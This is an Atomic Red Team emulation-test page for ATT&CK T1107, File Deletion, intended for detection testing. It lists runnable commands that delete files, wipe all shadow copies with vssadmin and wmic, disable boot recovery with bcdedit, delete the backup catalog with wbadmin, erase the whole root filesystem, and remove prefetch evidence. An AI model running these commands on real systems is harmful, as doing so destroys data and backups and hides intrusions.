CircleCI Atomic Red Team doc generator
280 lines
6.9 KiB
Markdown
280 lines
6.9 KiB
Markdown
# T1107 - File Deletion
|
|
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1107)
|
|
<blockquote>Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.
|
|
|
|
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)</blockquote>
|
|
|
|
## Atomic Tests
|
|
|
|
- [Atomic Test #1 - Delete a single file - Linux/macOS](#atomic-test-1---delete-a-single-file---linuxmacos)
|
|
|
|
- [Atomic Test #2 - Delete an entire folder - Linux/macOS](#atomic-test-2---delete-an-entire-folder---linuxmacos)
|
|
|
|
- [Atomic Test #3 - Overwrite and delete a file with shred](#atomic-test-3---overwrite-and-delete-a-file-with-shred)
|
|
|
|
- [Atomic Test #4 - Delete a single file - Windows cmd](#atomic-test-4---delete-a-single-file---windows-cmd)
|
|
|
|
- [Atomic Test #5 - Delete an entire folder - Windows cmd](#atomic-test-5---delete-an-entire-folder---windows-cmd)
|
|
|
|
- [Atomic Test #6 - Delete a single file - Windows PowerShell](#atomic-test-6---delete-a-single-file---windows-powershell)
|
|
|
|
- [Atomic Test #7 - Delete an entire folder - Windows PowerShell](#atomic-test-7---delete-an-entire-folder---windows-powershell)
|
|
|
|
- [Atomic Test #8 - Delete VSS - vssadmin](#atomic-test-8---delete-vss---vssadmin)
|
|
|
|
- [Atomic Test #9 - Delete VSS - wmic](#atomic-test-9---delete-vss---wmic)
|
|
|
|
- [Atomic Test #10 - bcdedit](#atomic-test-10---bcdedit)
|
|
|
|
- [Atomic Test #11 - wbadmin](#atomic-test-11---wbadmin)
|
|
|
|
- [Atomic Test #12 - Delete Filesystem - Linux](#atomic-test-12---delete-filesystem---linux)
|
|
|
|
- [Atomic Test #13 - Delete-PrefetchFile](#atomic-test-13---delete-prefetchfile)
|
|
|
|
|
|
<br/>
|
|
|
|
## Atomic Test #1 - Delete a single file - Linux/macOS
|
|
Delete a single file from the temporary directory
|
|
|
|
**Supported Platforms:** Linux, macOS
|
|
|
|
|
|
#### Inputs
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| file_to_delete | Path of file to delete | Path | /tmp/victim-files/a|
|
|
|
|
#### Run it with `sh`!
|
|
```
|
|
rm -f #{file_to_delete}
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #2 - Delete an entire folder - Linux/macOS
|
|
Recursively delete the temporary directory and all files contained within it
|
|
|
|
**Supported Platforms:** Linux, macOS
|
|
|
|
|
|
#### Inputs
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| folder_to_delete | Path of folder to delete | Path | /tmp/victim-files|
|
|
|
|
#### Run it with `sh`!
|
|
```
|
|
rm -rf #{folder_to_delete}
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #3 - Overwrite and delete a file with shred
|
|
Use the `shred` command to overwrite the temporary file and then delete it
|
|
|
|
**Supported Platforms:** Linux
|
|
|
|
|
|
#### Inputs
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| file_to_shred | Path of file to shred | Path | /tmp/victim-shred.txt|
|
|
|
|
#### Run it with `sh`!
|
|
```
|
|
shred -u #{file_to_shred}
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #4 - Delete a single file - Windows cmd
|
|
Delete a single file from the temporary directory using cmd.exe
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
#### Inputs
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-cmd\a|
|
|
|
|
#### Run it with `command_prompt`!
|
|
```
|
|
del /f #{file_to_delete}
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #5 - Delete an entire folder - Windows cmd
|
|
Recursively delete the temporary directory and all files contained within it using cmd.exe
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
#### Inputs
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-cmd|
|
|
|
|
#### Run it with `command_prompt`!
|
|
```
|
|
del /f /S #{folder_to_delete}
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #6 - Delete a single file - Windows PowerShell
|
|
Delete a single file from the temporary directory using Powershell
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
#### Inputs
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-ps\a|
|
|
|
|
#### Run it with `powershell`!
|
|
```
|
|
Remove-Item -path "#{file_to_delete}"
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #7 - Delete an entire folder - Windows PowerShell
|
|
Recursively delete the temporary directory and all files contained within it using Powershell
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
#### Inputs
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-ps|
|
|
|
|
#### Run it with `powershell`!
|
|
```
|
|
Remove-Item -path "#{folder_to_delete}" -recurse
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #8 - Delete VSS - vssadmin
|
|
Delete all volume shadow copies with vssadmin.exe
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
|
|
```
|
|
vssadmin.exe Delete Shadows /All /Quiet
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #9 - Delete VSS - wmic
|
|
Delete all volume shadow copies with wmic
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
|
|
```
|
|
wmic shadowcopy delete
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #10 - bcdedit
|
|
This test leverages `bcdedit` to remove boot-time recovery measures.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
#### Run it with `command_prompt`!
|
|
```
|
|
bcdedit /set {default} bootstatuspolicy ignoreallfailures
|
|
bcdedit /set {default} recoveryenabled no
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #11 - wbadmin
|
|
This test deletes Windows Backup catalogs.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
|
|
```
|
|
wbadmin delete catalog -quiet
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #12 - Delete Filesystem - Linux
|
|
This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
|
|
|
|
**Supported Platforms:** Linux, CentOS, Ubuntu
|
|
|
|
|
|
#### Run it with `bash`!
|
|
```
|
|
rm -rf / --no-preserve-root > /dev/null 2> /dev/null
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #13 - Delete-PrefetchFile
|
|
Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
|
|
```
|
|
Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
|
|
```
|
|
|
|
|
|
|
|
<br/>
|